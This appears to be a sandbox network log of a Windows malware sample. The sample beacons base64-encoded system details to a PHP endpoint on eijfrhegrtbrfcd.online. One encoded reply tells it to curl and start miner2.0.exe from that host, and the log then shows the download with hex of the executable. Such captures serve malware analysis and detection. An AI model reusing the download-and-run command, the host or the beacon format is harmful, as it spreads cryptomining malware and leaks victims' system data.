                                                                                                                                                                2024-09-27 15:42:28 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:29 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:29 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ep2bkGE%2FA3J%2FvLjUzdS%2Bi3TLVyGO0tuyGcDM7Rjint4hcXkqWIEzDWuhntXPp%2FR8r8807GYhaRHxTp2LdZ7qknd5P0T2Z3KSZdn1xEJyJD9PdKJr7e1YmSBhCgp592jEECUgFW6TDKKE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a9689c4de96-EWR
                                                                                                                                                                2024-09-27 15:42:29 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                30192.168.2.449789172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:28 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:29 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:29 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FnP2t0Pmix%2B9D%2BCJEWZLLKseaC1SHpsDiuTSLjmEziABka8X1ykI5TJ93UGTxH9MSegcgtv5ULKzfxDmwybIa7kdcv8X1X%2Fo0W3UJddunZh1z1yBiFBCq23FXrRa1IVxazfY%2B7aFS0QK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a968f4072ab-EWR
                                                                                                                                                                2024-09-27 15:42:29 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                31192.168.2.449793172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:30 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:30 UTC624INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:30 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B4e%2FxXDJ03FszpFN5HhdtRqQNbC4AKYhBn9qmMcbWvOFnYHM700Lg81aT2tChbFYgbGB%2FySpyGkd3qKZUV99lbVxh%2Bspv9AWwGfKo5K1AB24QuZw8CaDMXIWaRIzThMRLDx%2Fv3PBbqR5"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a9f6fa4c334-EWR
                                                                                                                                                                2024-09-27 15:42:30 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                32192.168.2.449792172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:30 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:30 UTC626INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:30 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRzeZMkKAJQ1q9WiBIll%2FXLoUy%2FKJE7l7SrwMzoXIyiKnzmFLX3Ua%2FZC6YQZo%2BE8hbD91GJcZDxf0kHv6hWNud2IfW0aXtEPHK0B07Ow%2BecbJMjIU7NamxtgxFOcEJnAimCxT9FW6AlJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9a9fd99b0cba-EWR
                                                                                                                                                                2024-09-27 15:42:30 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                33192.168.2.449796172.67.187.1004431748C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:31 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:32 UTC622INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKusZanvXgMJS6GCXfOlwfpDLJdI63rh7GDg1eGoHz2uokfys3cAJIhoA%2Fy8qnaZZQYtmjWK9Z1LXAq6lGlGg%2FlkDoBS9E6cZYy4eXwlsum%2BcqolK9fT3n2ZwVKTkIrC1DlDU2Vho0a6"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9aa84cf8438d-EWR
                                                                                                                                                                2024-09-27 15:42:32 UTC192INData Raw: 62 61 0d 0a 0a 59 32 51 67 4c 32 51 67 4a 58 52 6c 62 58 41 6c 49 43 59 6d 49 47 52 6c 62 43 42 74 61 57 35 6c 63 6a 49 75 4d 43 35 6c 65 47 55 67 4d 6a 35 75 64 57 77 67 4a 69 59 67 59 33 56 79 62 43 41 74 62 79 42 74 61 57 35 6c 63 6a 49 75 4d 43 35 6c 65 47 55 67 61 48 52 30 63 48 4d 36 4c 79 39 6c 61 57 70 6d 63 6d 68 6c 5a 33 4a 30 59 6e 4a 6d 59 32 51 75 62 32 35 73 61 57 35 6c 4c 32 52 76 64 32 35 73 62 32 46 6b 4c 32 31 70 62 6d 56 79 4d 69 34 77 4c 6d 56 34 5a 53 41 6d 4a 69 42 7a 64 47 46 79 64 43 42 74 61 57 35 6c 63 6a 49 75 4d 43 35 6c 65 47 55 3d 0a 0d 0a
                                                                                                                                                                Data Ascii: baY2QgL2QgJXRlbXAlICYmIGRlbCBtaW5lcjIuMC5leGUgMj5udWwgJiYgY3VybCAtbyBtaW5lcjIuMC5leGUgaHR0cHM6Ly9laWpmcmhlZ3J0YnJmY2Qub25saW5lL2Rvd25sb2FkL21pbmVyMi4wLmV4ZSAmJiBzdGFydCBtaW5lcjIuMC5leGU=
                                                                                                                                                                2024-09-27 15:42:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                34192.168.2.449795172.67.187.1004437636C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:31 UTC621OUTPOST /iloverussia.php?token=ewogICJjcHVDb3JlcyI6ICI0IiwKICAidG90YWxNZW1vcnkiOiAiODE5MSBNQiIsCiAgInBsYXRmb3JtIjogIldpbmRvd3MiLAogICJhcmNoIjogIng2NCIsCiAgIm1vZGVsIjogIjYyMTM2NSIsCiAgIm9zVmVyc2lvbiI6ICJNaWNyb3NvZnQgV2luZG93cyAxMCIsCiAgInByb2Nlc3Nvck5hbWUiOiAiSW50ZWwoUikgQ29yZShUTSkyIENQVSA2NjAwIEAgMi40MCBHSHoiLAogICJzeXN0ZW1Nb2RlbCI6ICJ2bGJsZXgyMCwxIiwKICAiY29uZmlndXJhdGlvbiI6ICIxIiwKICAiZmlsZW5hbWUiOiAiTWljcm9zb2Z0LUVkZ2UuZXhlIiwKICAiYWRtaW4iOiAidHJ1ZSIsCiAgInRva2VuIjogIjU4Nzk0NjU5MTQiCn0= HTTP/1.1
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                User-Agent: A WinHTTP Example Program/1.0
                                                                                                                                                                Content-Length: 0
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                2024-09-27 15:42:32 UTC620INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:32 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                x-powered-by: PHP/8.0.30
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMcL4JtxlJFJaK4EaAjNhLyYK%2FibuAJGA6Ul9754YLXWmq5cz1o8CtBo9fGjAvX2YRiraJ1lz2PeN4FDC6TZMK8Qw6lqb4UIC5mF3AaHs%2BiPtCpcXtsRa4HKhlv4zL6WLQCUP8MH3o8p"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9aa9aefcc32a-EWR
                                                                                                                                                                2024-09-27 15:42:32 UTC7INData Raw: 32 0d 0a 0a 0a 0d 0a
                                                                                                                                                                Data Ascii: 2
                                                                                                                                                                2024-09-27 15:42:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                35192.168.2.449800172.67.187.1004436580C:\Windows\System32\curl.exe
                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                2024-09-27 15:42:32 UTC107OUTGET /download/miner2.0.exe HTTP/1.1
                                                                                                                                                                Host: eijfrhegrtbrfcd.online
                                                                                                                                                                User-Agent: curl/7.83.1
                                                                                                                                                                Accept: */*
                                                                                                                                                                2024-09-27 15:42:33 UTC720INHTTP/1.1 200 OK
                                                                                                                                                                Date: Fri, 27 Sep 2024 15:42:33 GMT
                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                Content-Length: 45056
                                                                                                                                                                Connection: close
                                                                                                                                                                last-modified: Fri, 20 Sep 2024 09:20:01 GMT
                                                                                                                                                                etag: "b000-622898b2b5240"
                                                                                                                                                                strict-transport-security: max-age=31536000;
                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                CF-Cache-Status: MISS
                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exS4%2BOP27w%2BM%2BWCthe3WimWffxwYNM7jCwiv%2F6cLf9acYMdTNos13OPv5CfGEzIrODAkdIgnlfOc3ZW2mAf49S6nDHxmQj1QUG%2FmXu48p7ymZ4Q2OB%2BZOzSUtplJSxfPSFla2aKcEept"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 8c9c9aaf99264405-EWR
                                                                                                                                                                2024-09-27 15:42:33 UTC649INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 c5 2d ed 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0b 00 00 a8 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00
                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd-f" @ @@@
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 00 00 0a 06 17 6f 0a 00 00 0a 06 17 6f 0b 00 00 0a 06 16 6f 0c 00 00 0a 06 17 6f 0d 00 00 0a 06 28 0e 00 00 0a 26 de 03 26 de 00 20 88 13 00 00 28 0f 00 00 0a de 03 26 de 00 28 10 00 00 0a 28 06 00 00 0a 72 0c 03 00 70 28 07 00 00 0a 28 02 00 00 06 6f 08 00 00 0a 28 11 00 00 0a 72 3e 03 00 70 28 12 00 00 0a 73 13 00 00 0a 72 50 03 00 70 6f 14 00 00 0a 74 01 00 00 1b 28 02 00 00 06 28 15 00 00 0a 73 04 00 00 0a 0b 07 72 01 00 00 70 6f 05 00 00 0a 07 1b 8d 0f 00 00 01 0c 08 16 72 90 03 00 70 a2 08 17 28 10 00 00 0a 28 06 00 00 0a 72 0c 03 00 70 28 07 00 00 0a 28 02 00 00 06 6f 08 00 00 0a 28 11 00 00 0a a2 08 18 72 98 03 00 70 a2 08 19 28 16 00 00 0a 6f 17 00 00 0a a2 08 1a 72 9e 03 00 70 a2 08 28 18 00 00 0a 6f 09 00 00 0a 07 28 10 00 00 0a 6f 19 00 00 0a
                                                                                                                                                                Data Ascii: oooo(&& (&((rp((o(r>p(srPpot((srporp((rp((o(rp(orp(o(o
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: ba 3a d6 ac ce 61 c2 f7 d9 d5 b1 19 8d 9f 1f 7f 88 bf 50 d7 c3 65 d2 cf be bc e4 27 76 56 86 a4 d6 9f c6 19 0e d6 dc fb 8a 7a bc f6 89 6b 83 08 4d 75 53 12 1d 45 d5 a2 7c 3a f2 38 4c bb f7 75 a6 68 61 0d a2 a1 db d2 95 2c 96 7f 43 9b 4f 74 ee 4f d7 c6 a0 2f 86 29 13 27 be 6b 72 14 2e 2d aa cb 85 55 27 d1 db 27 2a 1d 4e 5e 86 0d 1b a7 6f 70 85 6a 59 f1 62 04 9e b5 52 7d a9 d8 98 a5 9b 5d 75 9e f9 21 15 29 dd e3 a2 6b 82 42 56 32 79 98 5a 44 4a f1 eb b2 45 30 94 8e a5 c8 81 72 dd dc d5 c9 89 83 37 e6 67 ca 35 d3 30 99 1d 48 e5 7f 8a 6e 3d 6c b6 74 48 2d 54 d2 e2 2e 89 19 46 32 f8 16 88 33 65 96 2f 4a 3a 09 7b 11 47 a2 ab 10 98 ca 52 3e 11 48 a0 05 11 57 f3 0e 8c 1d d2 0c 27 ab 97 c9 cd ae e4 73 31 63 1d c4 52 46 bb af aa cf 73 c0 0f 27 ac 74 b2 fc ed b8 c9
                                                                                                                                                                Data Ascii: :aPe'vVzkMuSE|:8Luha,COtO/)'kr.-U''*N^opjYbR}]u!)kBV2yZDJE0r7g50Hn=ltH-T.F23e/J:{GR>HW's1cRFs't
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 33 50 64 8c 4f 63 40 eb 36 ad 3d df 66 3f 23 8a a9 59 ad 66 bd cd 43 fa 2e 30 4f 0f d4 a4 6f c8 d6 4d 57 4e 1e 22 c8 5d 68 4d c2 98 bb 1e cc 45 82 94 6a 18 97 79 28 5f 22 3b 82 f5 14 17 3f 3c 7c 8c 13 c3 f5 e5 27 a3 bb 97 7d 2a b8 29 cb 62 0c 9f fd 63 11 99 de 28 e2 81 11 28 f2 ae e2 e2 63 2c 1f e4 81 40 7f 5c 70 89 de 19 8a 95 3f 0a 8c 18 b1 9f 8d 98 f9 c0 b3 9d 11 74 ce f8 72 49 18 5d 46 bf 98 c5 e2 80 03 d1 65 0f 62 a9 a1 e2 71 cd ea c2 fc c8 46 9e fa c1 00 e6 b9 7d cc 25 53 e8 f6 ee 0b fd 48 94 ff 54 1e 22 91 ac 6c 57 68 d0 85 3c ae 46 09 6b 87 4e bd 3d 7b c3 45 3b ef bb 3e 6f b3 2a 86 41 26 a9 88 35 35 eb 93 56 ba 48 4b 4c 39 87 04 62 2d 9e 3c c9 46 3a ab 01 04 70 07 9c 57 19 ba ca 04 e9 b4 2f 44 43 0b c1 c2 e7 e7 21 34 c1 b5 1b 66 89 ea 84 56 5e 1d
                                                                                                                                                                Data Ascii: 3PdOc@6=f?#YfC.0OoMWN"]hMEjy(_";?<|'}*)bc((c,@\p?trI]FebqF}%SHT"lWh<FkN={E;>o*A&55VHKL9b-<F:pW/DC!4fV^
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: 2c 92 ca e0 b4 6c d6 1c d7 86 20 0c 60 b8 a3 2c 76 9f e2 02 c6 a0 d7 61 2a fd 00 85 fe 1d 95 e2 bd 30 83 dc c4 63 ba be 33 06 27 f7 76 bb 8f 7e 1b 16 39 d6 e9 ec ad c1 c1 b1 ed 1d 57 3e f4 9c 1d 4f 22 38 9c af b4 7a ab 7d 14 96 59 95 18 58 59 81 b4 fc 4a a3 a6 c5 0d 3f ba ca 91 ae 9e ea fc b4 b0 5b bc fa 55 e3 f3 42 e2 0a 31 95 7e a4 37 07 75 5a a7 39 55 04 75 df 54 e7 e8 e1 4f 54 8c 9a fa 93 47 c3 d6 8c 89 68 da 56 3c 93 e6 4f 0a 0f 74 a8 da fd 2d 9b b0 19 a8 7c 14 97 a0 71 19 ee 8d 1c 55 c6 98 d4 dc 05 ee 99 2c d9 df d5 17 1c 50 e5 9f 85 e0 48 74 68 c4 db 85 52 9f 4d b2 85 6f 5b a1 b6 8a 0a 2a 48 36 74 93 d2 8b d8 87 67 a0 bc 50 47 30 ac f0 fa f8 ba d0 46 b6 2f 5d 15 30 41 68 7f c7 6c f4 2d 81 78 5f 87 e6 d9 34 1e 48 e5 2d 9d 96 ce 64 79 0a 2a f7 7a ba
                                                                                                                                                                Data Ascii: ,l `,va*0c3'v~9W>O"8z}YXYJ?[UB1~7uZ9UuTOTGhV<Ot-|qU,PHthRMo[*H6tgPG0F/]0Ahl-x_4H-dy*z
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: fd 62 f6 01 97 bb b8 1d 4b e9 e6 5c 58 55 aa 09 68 3f 74 42 f0 c7 29 cf ce 74 86 72 5f 0f fb 84 c7 07 66 75 c1 89 ce 17 a6 51 5f e6 66 f5 57 f7 df fb 13 90 9d c9 4e cb ef 4d 93 a8 d5 48 a2 6a f9 46 18 8e ba fd 1f 7f 67 09 9d 74 e1 82 c6 92 40 49 6e 3b d8 f1 d4 53 52 9a 02 ea 88 b3 dd 42 9f 91 78 0d 8e 75 df 04 db 26 ef 65 34 7f 11 3d b8 b8 20 49 c7 21 dd 7f e9 4c ab b2 e9 c9 bb dd 46 6d fc 2a 97 1b 18 f0 8c 52 3e 31 96 29 89 25 e9 a7 f9 0d e7 91 65 83 60 f8 e5 d4 36 45 2f 58 31 50 d4 71 8c f1 58 05 28 d8 15 46 90 ad f9 3e 28 c2 27 9d a1 1a c5 7d 4f 64 d2 14 91 07 83 a1 a8 1e 78 aa 65 fc 25 4b 26 db b8 b0 4e 97 e7 c2 7a 55 c9 32 19 3e d7 7e a6 b3 e4 28 bb 26 e3 ac b9 25 6f 98 9c cd b9 ad f5 98 82 5d e0 44 e7 31 4f cd 61 ac 88 4a eb 32 16 60 71 b6 9b aa 2d
                                                                                                                                                                Data Ascii: bK\XUh?tB)tr_fuQ_fWNMHjFgt@In;SRBxu&e4= I!LFm*R>1)%e`6E/X1PqX(F>('}Odxe%K&NzU2>~(&%o]D1OaJ2`q-
                                                                                                                                                                2024-09-27 15:42:33 UTC1369INData Raw: b7 17 29 65 8e 48 5e f6 b4 e9 0b 04 5d cc 7b 03 28 d8 bc 2b cf 3a e5 29 9a 6a a0 61 7b ea f2 0d df c5 4c 2f d9 ad 4a e8 68 a6 16 17 42 de 5e a1 43 9f d6 13 23 57 db 9a 55 83 b1 e0 00 e9 b4 7e c3 5c a8 06 bc 15 cb 41 2e 05 42 2d 91 e6 8a f0 51 ab c9 bd a5 ab d1 a1 b4 72 0f ed 4b 67 82 d8 15 8c 8d f4 8c 4c 70 7e dd 38 3b 5e 7c b5 be 7a 99 1b 58 ad 53 ea 43 b2 52 f7 fd ce 54 cb de ab 2b 3a 30 69 00 24 17 76 54 6e 25 f7 5b f3 4b 66 c0 8b 6a 0c a9 09 f8 f3 33 d2 e3 9b 2d bc 14 f4 0b a8 d1 eb 6c 76 91 05 2d 75 51 4c 87 01 70 de 9e 16 1d 09 73 cd ec 33 fd 7e 6d a0 75 65 6f 5e 02 7d 35 64 80 78 54 7f 64 aa 2c 07 9a 78 27 55 e0 65 77 9c 3e 4c 9f 6d cf 3d e1 a3 59 11 02 e3 d4 3c 85 7f 02 0c 2c 81 fa e6 89 7a 8b c3 8e d0 b3 7e 04 b5 ab ef 02 cb 59 7d ec b5 9d 31 be
                                                                                                                                                                Data Ascii: )eH^]{(+:)ja{L/JhB^C#WU~\A.B-QrKgLp~8;^|zXSCRT+:0i$vTn%[Kfj3-lv-uQLps3~mueo^}5dxTd,x'Uew>Lm=Y<,z~Y}1
